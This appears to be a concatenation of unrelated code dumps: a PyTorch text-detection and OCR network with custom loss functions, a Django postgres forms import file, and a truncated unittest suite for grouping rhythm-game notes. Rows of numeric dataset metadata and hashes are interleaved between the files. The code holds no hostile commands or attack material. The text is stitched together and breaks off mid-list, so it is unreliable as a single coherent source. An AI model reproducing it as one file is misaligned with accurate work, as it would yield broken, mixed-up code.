nn.Conv2d(inp, inp, 3, stride, 1 + (dilation > 0) * (dilation -1), dilation=dilation, groups=inp, bias=False),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
InstanceNorm2d(oup, eps=1e-05, momentum=0.1),
nn.LeakyReLU(inplace=True, negative_slope=0.01),
)
def conv_dw_res_in(inp, oup, stride):
return nn.Sequential(
nn.Conv2d(inp, inp, 3, stride, 1, groups=inp, bias=False),
nn.InstanceNorm2d(inp, eps=1e-05, momentum=0.1, affine=True),
nn.LeakyReLU(inplace=True, negative_slope=0.01),
nn.Conv2d(inp, oup, 1, 1, 0, bias=False),
nn.InstanceNorm2d(oup, eps=1e-05, momentum=0.1, affine=True)
)
def dice_loss(inp, target):
smooth = 1.
iflat = inp.view(-1)
tflat = target.view(-1)
intersection = (iflat * tflat).sum()
return - ((2. * intersection + smooth) /
(iflat.sum() + tflat.sum() + smooth))
class BasicBlockSep(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(BasicBlockSep, self).__init__()
self.conv_sep1 = conv_dw(inplanes, planes, stride, dilation=dilation)
self.conv2 = conv_dw_res(planes, planes, 1)
self.downsample = downsample
self.stride = stride
self.relu = LeakyReLU(negative_slope=0.01, inplace=True)
def forward(self, x):
residual = x
out = self.conv_sep1(x)
out = self.conv2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class BasicBlockIn(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlockIn, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
self.bn1 = InstanceNorm2d(planes, eps=1e-05, momentum=0.1, affine=True)
self.relu = nn.ReLU(inplace=True)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=1, padding=1, bias=False)
self.bn2 = InstanceNorm2d(planes, eps=1e-05, momentum=0.1, affine=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class BasicBlockSepIn(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, dilation=1):
super(BasicBlockSepIn, self).__init__()
self.conv_sep1 = conv_dw_in(inplanes, planes, stride, dilation=dilation)
self.conv2 = conv_dw_res_in(planes, planes, 1)
self.downsample = downsample
self.stride = stride
self.relu = LeakyReLU(negative_slope=0.01, inplace=True)
def forward(self, x):
residual = x
out = self.conv_sep1(x)
out = self.conv2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
def iou_loss(roi_gt, byte_mask, roi_pred, box_loss_value):
d1_gt = roi_gt[:, :, :, 0][byte_mask]
d2_gt = roi_gt[:, :, :, 1][byte_mask]
d3_gt = roi_gt[:, :, :, 2][byte_mask]
d4_gt = roi_gt[:, :, :, 3][byte_mask]
mask3 = torch.gt(d3_gt, 0)
mask4 = torch.gt(d4_gt, 0)
d3_gt = d3_gt[mask3]
d4_gt = d4_gt[mask4]
d1_pred = roi_pred[:, 0, :, :][byte_mask]
d2_pred = roi_pred[:, 1, :, :][byte_mask]
d3_pred = roi_pred[:, 2, :, :][byte_mask]
d3_pred = d3_pred[mask3]
d4_pred = roi_pred[:, 3, :, :][byte_mask]
d4_pred = d4_pred[mask4]
area_gt_l = (d1_gt[mask3] + d2_gt[mask3]) * (d3_gt)
area_pred_l = (d1_pred[mask3] + d2_pred[mask3]) * (d3_pred)
w_union_l = torch.min(d3_gt, d3_pred)
h_union_l = torch.min(d1_gt[mask3], d1_pred[mask3]) + torch.min(d2_gt[mask3], d2_pred[mask3])
area_intersect_l = w_union_l * h_union_l
area_union_l = area_gt_l + area_pred_l - area_intersect_l
AABB_l = - torch.log((area_intersect_l + 1.0)/(area_union_l + 1.0))
if AABB_l.dim() > 0:
box_loss_value += torch.mean(AABB_l)
area_gt_r = (d1_gt[mask4] + d2_gt[mask4]) * (d4_gt)
area_pred_r = (d1_pred[mask4] + d2_pred[mask4]) * (d4_pred)
w_union_r = torch.min(d4_gt, d4_pred)
h_union_r = torch.min(d1_gt[mask4], d1_pred[mask4]) + torch.min(d2_gt[mask4], d2_pred[mask4])
area_intersect_r = w_union_r * h_union_r
area_union_r = area_gt_r + area_pred_r - area_intersect_r
AABB_r = - torch.log((area_intersect_r + 1.0)/(area_union_r + 1.0))
if AABB_r.dim() > 0:
box_loss_value += torch.mean(AABB_r)
class ModelResNetSep2(nn.Module):
def recompute(self):
self.layer0[0].recompute_weights()
self.layer0[2].recompute_weights()
self.layer0_1[0].recompute_weights()
self.layer0_1[2].recompute_weights()
def __init__(self, attention = False, multi_scale = True):
super(ModelResNetSep2, self).__init__()
self.inplanes = 64
self.layer0 = nn.Sequential(
Conv2d(3, 16, 3, stride=1, padding=1, bias=False),
CReLU_IN(16),
Conv2d(32, 32, 3, stride=2, padding=1, bias=False),
CReLU_IN(32)
)
self.layer0_1 = nn.Sequential(
Conv2d(64, 64, 3, stride=1, padding=1, bias=False),
#nn.InstanceNorm2d(64, affine=True),
nn.ReLU(),
Conv2d(64, 64, 3, stride=2, padding=1, bias=False),
#nn.InstanceNorm2d(64, affine=True),
nn.ReLU(inplace=True)
)
self.conv5 = Conv2d(64, 128, (3,3), padding=(1, 1), bias=False)
self.conv6 = Conv2d(128, 128, (3,3), padding=1, bias=False)
self.conv7 = Conv2d(128,256, 3, padding=1, bias=False)
self.conv8 = Conv2d(256, 256, (3,3), padding=1, bias=False)
self.conv9 = Conv2d(256, 256, (3,3), padding=(1, 1), bias=False)
self.conv10_s = Conv2d(256, 256, (2, 3), padding=(0, 1), bias=False)
self.conv11 = Conv2d(256, 8400, (1, 1), padding=(0,0))
self.batch5 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
self.batch6 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
self.batch7 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch8 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch9 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch10_s = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.max2 = nn.MaxPool2d((2, 1), stride=(2,1))
self.leaky = LeakyReLU(negative_slope=0.01, inplace=True)
self.layer1 = self._make_layer(BasicBlockIn, 64, 3, stride=1)
self.inplanes = 64
self.layer2 = self._make_layer(BasicBlockIn, 128, 4, stride=2)
self.layer3 = self._make_layer(BasicBlockSepIn, 256, 6, stride=2)
self.layer4 = self._make_layer(BasicBlockSepIn, 512, 4, stride=2)
self.feature4 = nn.Conv2d(512, 256, 1, stride=1, padding=0, bias=False)
self.feature3 = nn.Conv2d(256, 256, 1, stride=1, padding=0, bias=False)
self.feature2 = nn.Conv2d(128, 256, 1, stride=1, padding=0, bias=False)
self.upconv2 = conv_dw_plain(256, 256, stride=1)
self.upconv1 = conv_dw_plain(256, 256, stride=1)
self.feature1 = nn.Conv2d(64, 256, 1, stride=1, padding=0, bias=False)
self.act = Conv2d(256, 1, (1,1), padding=0, stride=1)
self.rbox = Conv2d(256, 4, (1,1), padding=0, stride=1)
self.angle = Conv2d(256, 2, (1,1), padding=0, stride=1)
self.drop1 = Dropout2d(p=0.2, inplace=False)
self.angle_loss = nn.MSELoss(reduction='elementwise_mean')
self.h_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
self.w_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
self.attention = attention
if self.attention:
self.conv_attenton = nn.Conv2d(256, 1, kernel_size=1, stride=1, padding=0, bias=True)
self.multi_scale = multi_scale
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward_ocr(self, x):
x = self.conv5(x)
x = self.batch5(x)
x = self.leaky(x)
x = self.conv6(x)
x = self.leaky(x)
x = self.conv6(x)
x = self.leaky(x)
x = self.max2(x)
x = self.conv7(x)
x = self.batch7(x)
x = self.leaky(x)
x = self.conv8(x)
x = self.leaky(x)
x = self.conv8(x)
x = self.leaky(x)
x = self.conv9(x)
x = self.leaky(x)
x = self.conv9(x)
x = self.leaky(x)
x = self.max2(x)
x = self.conv10_s(x)
x = self.batch10_s(x)
x = self.leaky(x)
x = self.drop1(x)
x = self.conv11(x)
x = x.squeeze(2)
x = x.permute(0,2,1)
y = x
x = x.contiguous().view(-1,x.data.shape[2])
x = LogSoftmax(len(x.size()) - 1)(x)
x = x.view_as(y)
x = x.permute(0,2,1)
return x
def forward_features(self, x):
x = self.layer0(x)
focr = self.layer0_1(x)
return focr
def forward(self, x):
x = self.layer0(x)
x = self.layer0_1(x)
x = self.drop1(x)
su3 = self.layer1(x)
features1 = self.feature1(su3)
su2 = self.layer2(su3)
features2 = self.feature2(su2)
su1 = self.layer3(su2)
features3 = self.feature3(su1)
x = self.layer4(su1)
x = self.drop1(x)
features4 = self.feature4(x)
if self.attention:
att = self.conv_attenton(features4)
att = torch.sigmoid(att)
att = att.expand_as(features4)
att_up = F.interpolate(att, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
x = F.interpolate(features4, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
if self.attention:
x = x + features3 * att_up
att = self.conv_attenton(x)
att = torch.sigmoid(att)
att_up = F.interpolate(att, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
else:
x = x + features3
x = F.interpolate(x, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
x = self.upconv1(x)
if self.attention:
features2 = x + features2 * att_up
att = self.conv_attenton(features2)
att = torch.sigmoid(att)
att_up = F.interpolate(att, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
else:
features2 = x + features2
x = features2
x = F.interpolate(x, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
x = self.upconv2(x)
if self.attention:
x = x + features1 * att_up
else:
x += features1
segm_pred2 = torch.sigmoid(self.act(features2))
rbox2 = torch.sigmoid(self.rbox(features2)) * 128
angle2 = torch.sigmoid(self.angle(features2)) * 2 - 1
angle_den = torch.sqrt(angle2[:, 0, :, :] * angle2[:, 0, :, :] + angle2[:, 1, :, :] * angle2[:, 1, :, :]).unsqueeze(1)
angle_den = angle_den.expand_as(angle2)
angle2 = angle2 / angle_den
x = self.drop1(x)
segm_pred = torch.sigmoid(self.act(x))
rbox = torch.sigmoid(self.rbox(x)) * 128
angle = torch.sigmoid(self.angle(x)) * 2 - 1
angle_den = torch.sqrt(angle[:, 0, :, :] * angle[:, 0, :, :] + angle[:, 1, :, :] * angle[:, 1, :, :]).unsqueeze(1)
angle_den = angle_den.expand_as(angle)
angle = angle / angle_den
return [segm_pred, segm_pred2], [rbox, rbox2], [angle, angle2], x
def loss(self, segm_preds, segm_gt, iou_mask, angle_preds, angle_gt, roi_pred, roi_gt):
self.box_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
self.angle_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
segm_pred = segm_preds[0].squeeze(1)
angle_pred = angle_preds[0]
self.segm_loss_value = dice_loss(segm_pred * iou_mask , segm_gt * iou_mask )
segm_pred1 = segm_preds[1].squeeze(1)
if self.multi_scale:
iou_gts = F.interpolate(segm_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
iou_masks = F.interpolate(iou_mask.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
self.segm_loss_value += dice_loss(segm_pred1 * iou_masks, iou_gts * iou_masks )
byte_mask = torch.gt(segm_gt, 0.5)
if byte_mask.sum() > 0:
gt_sin = torch.sin(angle_gt[byte_mask])
gt_cos = torch.cos(angle_gt[byte_mask])
sin_val = self.angle_loss(angle_pred[:, 0, :, :][byte_mask], gt_sin)
cos_val = self.angle_loss(angle_pred[:, 1, :, :][byte_mask], gt_cos)
self.angle_loss_value += sin_val
self.angle_loss_value += cos_val
iou_loss(roi_gt, byte_mask, roi_pred[0], self.box_loss_value)
if self.multi_scale:
byte_mask = torch.gt(F.interpolate(segm_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True), 0.5).squeeze(1)
if byte_mask.sum() > 0:
angle_gts = F.interpolate(angle_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
gt_sin = torch.sin(angle_gts[byte_mask])
gt_cos = torch.cos(angle_gts[byte_mask])
sin_val = self.angle_loss(angle_preds[1][:, 0, :, :][byte_mask], gt_sin)
self.angle_loss_value += sin_val
self.angle_loss_value += self.angle_loss(angle_preds[1][:, 1, :, :][byte_mask], gt_cos)
roi_gt_s = F.interpolate(roi_gt.permute(0, 3, 1, 2), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True) / 2
roi_gt_s = roi_gt_s.permute(0, 2, 3, 1)
iou_loss(roi_gt_s, byte_mask, roi_pred[1], self.box_loss_value)
return self.segm_loss_value + self.angle_loss_value * 2 + 0.5 * self.box_loss_value
class ModelMLTRCTW(nn.Module):
def recompute(self):
self.layer0[0].recompute_weights()
self.layer0[2].recompute_weights()
self.layer0_1[0].recompute_weights()
self.layer0_1[2].recompute_weights()
def __init__(self, attention = False, multi_scale = True):
super(ModelMLTRCTW, self).__init__()
self.inplanes = 64
self.layer0 = nn.Sequential(
Conv2d(3, 16, 3, stride=1, padding=1, bias=False),
CReLU_IN(16),
Conv2d(32, 32, 3, stride=2, padding=1, bias=False),
CReLU_IN(32)
)
self.layer0_1 = nn.Sequential(
Conv2d(64, 64, 3, stride=1, padding=1, bias=False),
#nn.InstanceNorm2d(64, affine=True),
nn.ReLU(),
Conv2d(64, 64, 3, stride=2, padding=1, bias=False),
#nn.InstanceNorm2d(64, affine=True),
nn.ReLU(inplace=True)
)
self.conv5 = Conv2d(64, 128, (3,3), padding=(1, 1), bias=False)
self.conv6 = Conv2d(128, 128, (3,3), padding=1, bias=False)
self.conv7 = Conv2d(128,256, 3, padding=1, bias=False)
self.conv8 = Conv2d(256, 256, (3,3), padding=1, bias=False)
self.conv9 = Conv2d(256, 256, (3,3), padding=(1, 1), bias=False)
self.conv10_s = Conv2d(256, 256, (2, 3), padding=(0, 1), bias=False)
self.conv11 = Conv2d(256, 8400, (1, 1), padding=(0,0))
self.batch5 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
self.batch6 = InstanceNorm2d(128, eps=1e-05, momentum=0.1, affine=True)
self.batch7 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch8 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch9 = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.batch10_s = InstanceNorm2d(256, eps=1e-05, momentum=0.1, affine=True)
self.max2 = nn.MaxPool2d((2, 1), stride=(2,1))
self.leaky = LeakyReLU(negative_slope=0.01, inplace=True)
self.layer1 = self._make_layer(BasicBlockIn, 64, 3, stride=1)
self.inplanes = 64
self.layer2 = self._make_layer(BasicBlockIn, 128, 4, stride=2)
self.layer3 = self._make_layer(BasicBlockSepIn, 256, 6, stride=2)
self.layer4 = self._make_layer(BasicBlockSepIn, 512, 4, stride=2)
self.feature4 = nn.Conv2d(512, 256, 1, stride=1, padding=0, bias=False)
self.feature3 = nn.Conv2d(256, 256, 1, stride=1, padding=0, bias=False)
self.feature2 = nn.Conv2d(128, 256, 1, stride=1, padding=0, bias=False)
self.upconv2 = conv_dw_plain(256, 256, stride=1)
self.upconv1 = conv_dw_plain(256, 256, stride=1)
self.feature1 = nn.Conv2d(64, 256, 1, stride=1, padding=0, bias=False)
self.act = Conv2d(256, 1, (1,1), padding=0, stride=1)
self.rbox = Conv2d(256, 4, (1,1), padding=0, stride=1)
self.angle = Conv2d(256, 2, (1,1), padding=0, stride=1)
self.drop1 = Dropout2d(p=0.2, inplace=False)
self.angle_loss = nn.MSELoss(reduction='elementwise_mean')
self.h_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
self.w_loss = nn.SmoothL1Loss(reduction='elementwise_mean')
self.attention = attention
if self.attention:
self.conv_attenton = nn.Conv2d(256, 1, kernel_size=1, stride=1, padding=0, bias=True)
self.multi_scale = multi_scale
def copy_ocr(self):
import copy
self.layer0o = copy.deepcopy(self.layer0)
self.layer0_1o = copy.deepcopy(self.layer0_1)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward_ocr(self, x):
x = self.conv5(x)
x = self.batch5(x)
x = self.leaky(x)
x = self.conv6(x)
x = self.leaky(x)
x = self.conv6(x)
x = self.leaky(x)
x = self.max2(x)
x = self.conv7(x)
x = self.batch7(x)
x = self.leaky(x)
x = self.conv8(x)
x = self.leaky(x)
x = self.conv8(x)
x = self.leaky(x)
x = self.conv9(x)
x = self.leaky(x)
x = self.conv9(x)
x = self.leaky(x)
x = self.max2(x)
x = self.conv10_s(x)
x = self.batch10_s(x)
x = self.leaky(x)
x = self.drop1(x)
x = self.conv11(x)
x = x.squeeze(2)
x = x.permute(0,2,1)
y = x
x = x.contiguous().view(-1,x.data.shape[2])
x = LogSoftmax(len(x.size()) - 1)(x)
x = x.view_as(y)
x = x.permute(0,2,1)
return x
def forward_features(self, x):
x = self.layer0(x)
x = self.layer0_1(x)
return x
def forward(self, x):
x = self.layer0(x)
x = self.layer0_1(x)
x = self.drop1(x)
su3 = self.layer1(x)
features1 = self.feature1(su3)
su2 = self.layer2(su3)
features2 = self.feature2(su2)
su1 = self.layer3(su2)
features3 = self.feature3(su1)
x = self.layer4(su1)
x = self.drop1(x)
features4 = self.feature4(x)
if self.attention:
att = self.conv_attenton(features4)
att = torch.sigmoid(att)
att = att.expand_as(features4)
att_up = F.interpolate(att, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
x = F.interpolate(features4, size=(features3.size(2), features3.size(3)), mode='bilinear', align_corners=True)
if self.attention:
x = x + features3 * att_up
att = self.conv_attenton(x)
att = torch.sigmoid(att)
att_up = F.interpolate(att, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
else:
x = x + features3
x = F.interpolate(x, size=(features2.size(2), features2.size(3)), mode='bilinear', align_corners=True)
x = self.upconv1(x)
if self.attention:
features2 = x + features2 * att_up
att = self.conv_attenton(features2)
att = torch.sigmoid(att)
att_up = F.interpolate(att, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
else:
features2 = x + features2
x = features2
x = F.interpolate(x, size=(features1.size(2), features1.size(3)), mode='bilinear', align_corners=True)
x = self.upconv2(x)
if self.attention:
x = x + features1 * att_up
else:
x += features1
segm_pred2 = torch.sigmoid(self.act(features2))
rbox2 = torch.sigmoid(self.rbox(features2)) * 128
angle2 = torch.sigmoid(self.angle(features2)) * 2 - 1
angle_den = torch.sqrt(angle2[:, 0, :, :] * angle2[:, 0, :, :] + angle2[:, 1, :, :] * angle2[:, 1, :, :]).unsqueeze(1)
angle_den = angle_den.expand_as(angle2)
angle2 = angle2 / angle_den
x = self.drop1(x)
segm_pred = torch.sigmoid(self.act(x))
rbox = torch.sigmoid(self.rbox(x)) * 128
angle = torch.sigmoid(self.angle(x)) * 2 - 1
angle_den = torch.sqrt(angle[:, 0, :, :] * angle[:, 0, :, :] + angle[:, 1, :, :] * angle[:, 1, :, :]).unsqueeze(1)
angle_den = angle_den.expand_as(angle)
angle = angle / angle_den
return [segm_pred, segm_pred2], [rbox, rbox2], [angle, angle2], x
def loss(self, segm_preds, segm_gt, iou_mask, angle_preds, angle_gt, roi_pred, roi_gt):
self.box_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
self.angle_loss_value = torch.tensor(0.0, requires_grad = True).cuda()
segm_pred = segm_preds[0].squeeze(1)
angle_pred = angle_preds[0]
self.iou_loss_value = dice_loss(segm_pred * iou_mask , segm_gt * iou_mask )
segm_pred1 = segm_preds[1].squeeze(1)
if self.multi_scale:
iou_gts = F.interpolate(segm_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
iou_masks = F.interpolate(iou_mask.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
self.iou_loss_value += dice_loss(segm_pred1 * iou_masks, iou_gts * iou_masks )
masked_segm = segm_gt.data
byte_mask = torch.gt(masked_segm, 0.5)
if byte_mask.sum() > 0:
gt_sin = torch.sin(angle_gt[byte_mask])
gt_cos = torch.cos(angle_gt[byte_mask])
sin_val = self.angle_loss(angle_pred[:, 0, :, :][byte_mask], gt_sin)
cos_val = self.angle_loss(angle_pred[:, 1, :, :][byte_mask], gt_cos)
if not np.isnan(sin_val.data.cpu().numpy()):
self.angle_loss_value += sin_val
if not np.isnan(cos_val.data.cpu().numpy()):
self.angle_loss_value += cos_val
iou_loss(roi_gt, byte_mask, roi_pred[0], self.box_loss_value)
if self.multi_scale:
byte_mask = torch.gt(F.interpolate(masked_segm.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True), 0.5).squeeze(1)
if byte_mask.sum() > 0:
angle_gts = F.interpolate(angle_gt.unsqueeze(1), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True).squeeze(1)
gt_sin = torch.sin(angle_gts[byte_mask])
gt_cos = torch.cos(angle_gts[byte_mask])
sin_val = self.angle_loss(angle_preds[1][:, 0, :, :][byte_mask], gt_sin)
if not np.isnan(sin_val.data.cpu().numpy()):
self.angle_loss_value += sin_val
cos_val = self.angle_loss(angle_preds[1][:, 1, :, :][byte_mask], gt_cos)
if not np.isnan(cos_val.data.cpu().numpy()):
self.angle_loss_value += cos_val
roi_gt_s = F.interpolate(roi_gt.permute(0, 3, 1, 2), size=(segm_pred1.size(1), segm_pred1.size(2)), mode='bilinear', align_corners=True) / 2
roi_gt_s = roi_gt_s.permute(0, 2, 3, 1)
roi_gt_s = roi_gt_s / 2
iou_loss(roi_gt_s, byte_mask, roi_pred[1], self.box_loss_value)
return torch.stack( (self.iou_loss_value, self.angle_loss_value, self.box_loss_value) )
| 34.795039
| 169
| 0.631749
| 4,030
| 26,653
| 4.018114
| 0.059801
| 0.010128
| 0.021861
| 0.032607
| 0.883345
| 0.873093
| 0.864942
| 0.859137
| 0.842525
| 0.836287
| 0
| 0.063781
| 0.216448
| 26,653
| 765
| 170
| 34.840523
| 0.711597
| 0.007466
| 0
| 0.784211
| 0
| 0
| 0.010286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057895
| false
| 0
| 0.012281
| 0.012281
| 0.126316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9158f1e7cc0e15dbe063889fd076849a0fe8e5ff
| 118
|
py
|
Python
|
venv/lib/python3.6/site-packages/django/contrib/postgres/forms/__init__.py
|
xiegudong45/typeidea
|
db6504a232d120d6ffa185730bd35b9b9ecffa6c
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
checkerista/.env/Lib/site-packages/django/contrib/postgres/forms/__init__.py
|
LybaFatimaNasir/CS311S20PID02
|
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
|
[
"MIT"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
checkerista/.env/Lib/site-packages/django/contrib/postgres/forms/__init__.py
|
LybaFatimaNasir/CS311S20PID02
|
bc29a8c4c9ee508c74d231c015a57b1ca4dfcb39
|
[
"MIT"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
from .array import * # NOQA
from .hstore import * # NOQA
from .jsonb import * # NOQA
from .ranges import * # NOQA
| 23.6
| 29
| 0.661017
| 16
| 118
| 4.875
| 0.4375
| 0.512821
| 0.538462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.237288
| 118
| 4
| 30
| 29.5
| 0.866667
| 0.161017
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
916448fcf1b92bd11dde344e0c57d11f2b1fe248
| 14,524
|
py
|
Python
|
simfile/notes/tests/test_group.py
|
garcia/simfile
|
4e15660c964d8d3c0e6d1f69431138e7eb4db288
|
[
"MIT"
] | 22
|
2017-04-24T05:37:13.000Z
|
2022-03-08T00:41:37.000Z
|
simfile/notes/tests/test_group.py
|
garcia/simfile
|
4e15660c964d8d3c0e6d1f69431138e7eb4db288
|
[
"MIT"
] | 10
|
2021-05-31T01:21:56.000Z
|
2022-03-17T04:26:54.000Z
|
simfile/notes/tests/test_group.py
|
garcia/simfile
|
4e15660c964d8d3c0e6d1f69431138e7eb4db288
|
[
"MIT"
] | 3
|
2019-06-05T15:23:53.000Z
|
2021-09-11T02:39:36.000Z
|
import unittest
from .. import Note, NoteType, NoteData
from ..group import *
from ...timing import Beat
def testing_valid_notes():
return NoteData(
'1200\n'
'0010\n'
'0001\n'
'0010\n'
',\n'
'1300\n'
'0001\n'
'4004\n'
'0010\n'
',\n'
'3000\n'
'1000\n'
'0003\n'
'0001\n'
',\n'
'2000\n'
'0200\n'
'0010\n'
'0001\n'
',\n'
'0310\n'
'0001\n'
'3010\n'
'1001\n'
)
def testing_invalid_notes():
return NoteData(
'3000\n'
'0200\n'
'0200\n'
'0304\n'
',\n'
'2000\n'
'1000\n'
'3000\n'
'0020\n'
)
class TestGroupNotes(unittest.TestCase):
def test_default_configuration(self):
grouped_notes = list(group_notes(testing_valid_notes()))
self.assertListEqual([
[Note(beat=Beat(0), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(4), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(4), column=1, note_type=NoteType.TAIL)],
[Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD)],
[Note(beat=Beat(6), column=3, note_type=NoteType.ROLL_HEAD)],
[Note(beat=Beat(7), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(8), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(9), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(10), column=3, note_type=NoteType.TAIL)],
[Note(beat=Beat(11), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(12), column=0, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(13), column=1, note_type=NoteType.HOLD_HEAD)],
[Note(beat=Beat(14), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(15), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(16), column=1, note_type=NoteType.TAIL)],
[Note(beat=Beat(16), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(17), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(18), column=0, note_type=NoteType.TAIL)],
[Note(beat=Beat(18), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(19), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(19), column=3, note_type=NoteType.TAP)],
], grouped_notes)
def test_join_heads_to_tails(self):
grouped_notes = list(group_notes(
testing_valid_notes(),
join_heads_to_tails=True,
))
self.assertListEqual([
[Note(beat=Beat(0), column=0, note_type=NoteType.TAP)],
[NoteWithTail(beat=Beat(0), column=1, note_type=NoteType.HOLD_HEAD, tail_beat=Beat(4))],
[Note(beat=Beat(1), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(2), column=3, note_type=NoteType.TAP)],
[Note(beat=Beat(3), column=2, note_type=NoteType.TAP)],
[Note(beat=Beat(4), column=0, note_type=NoteType.TAP)],
[Note(beat=Beat(5), column=3, note_type=NoteType.TAP)],
[NoteWithTail(beat=Beat(6), column=0, note_type=NoteType.ROLL_HEAD, tail_beat=Beat(8))],
